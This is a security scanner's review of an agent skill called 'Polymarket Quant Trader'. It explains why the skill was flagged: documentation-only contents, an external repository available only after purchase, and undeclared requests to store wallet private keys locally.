Skillv1.0.0

ClawScan security

Polymarket Quant Trader · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

ReviewMar 14, 2026, 4:02 PM

Verdict: Review
Confidence: medium
Model: gpt-5-mini
Summary: The skill's documentation describes a full TypeScript trading bot that requires wallet keys and runnable code, but the published package only contains documentation (no source, no install), and it asks you to obtain/run an external repo and place private keys in .env — these mismatches warrant caution.
Guidance: Do not give this skill your main wallet private keys or seed phrase. Before installing or running anything: (1) insist on the repository URL and review the actual code (npm scripts, build steps, any transaction-signing logic) in a trusted environment; (2) run the cloned code in a sandbox/container and review any scripts that auto-execute or call external endpoints; (3) if you want to test, use a dedicated wallet with minimal funds and paper-trade mode only; (4) confirm how the autoresearch loop behaves overnight (does it auto-run code that can sign transactions?), and disable any automatic signing or live trading until you've audited it; (5) request clarification from the publisher about why the skill bundle lacks the claimed source and where the 'repo provided after purchase' is hosted — only proceed if you can fully audit that external repo.

Review Dimensions

Purpose & Capability: concernThe README and SKILL.md claim the package 'ships with TypeScript source, npm scripts, and a backtester', yet the published skill contains only documentation files and no code or install spec. The README instructs you to 'git clone <repo-url-provided-after-purchase>', implying required code lives off-package or behind a purchase step — this is inconsistent with the claim that source is included in the skill bundle.
Instruction Scope: noteSKILL.md and README include concrete dev/runtime actions (npm scripts, running arb scans, autoresearch loops) and instruct users to configure a .env with wallet keys and risk parameters. The skill does not contain runtime code here, and the instructions do not explicitly tell the agent to read local secrets, but they do direct the user to store private wallet keys locally and to clone/run external code — which is out-of-band and increases risk if you don't inspect that code first.
Install Mechanism: noteThere is no install spec in the skill (instruction-only), which is low risk for the registry bundle itself. However, the README directs you to git-clone an external repository (URL provided only after 'purchase'), which means arbitrary external code will be fetched and executed locally when following the guide. That external-download step is the primary install-time risk and is not auditable from the published skill files.
Credentials: concernThe skill clearly expects wallet private keys and live trading credentials for Polymarket (and possibly access to 1WIN feeds), but the skill metadata declares no required env vars or primary credential. Asking you to store wallet keys in a .env (and to run scripts that may sign transactions) without declaring or handling credentials is a proportionality mismatch and a user-safety concern.
Persistence & Privilege: okThe skill does not request 'always: true' or other elevated platform privileges; it is user-invocable and allows model invocation (the platform default). There is no evidence in the provided files that the skill will modify other skills or agent-wide settings.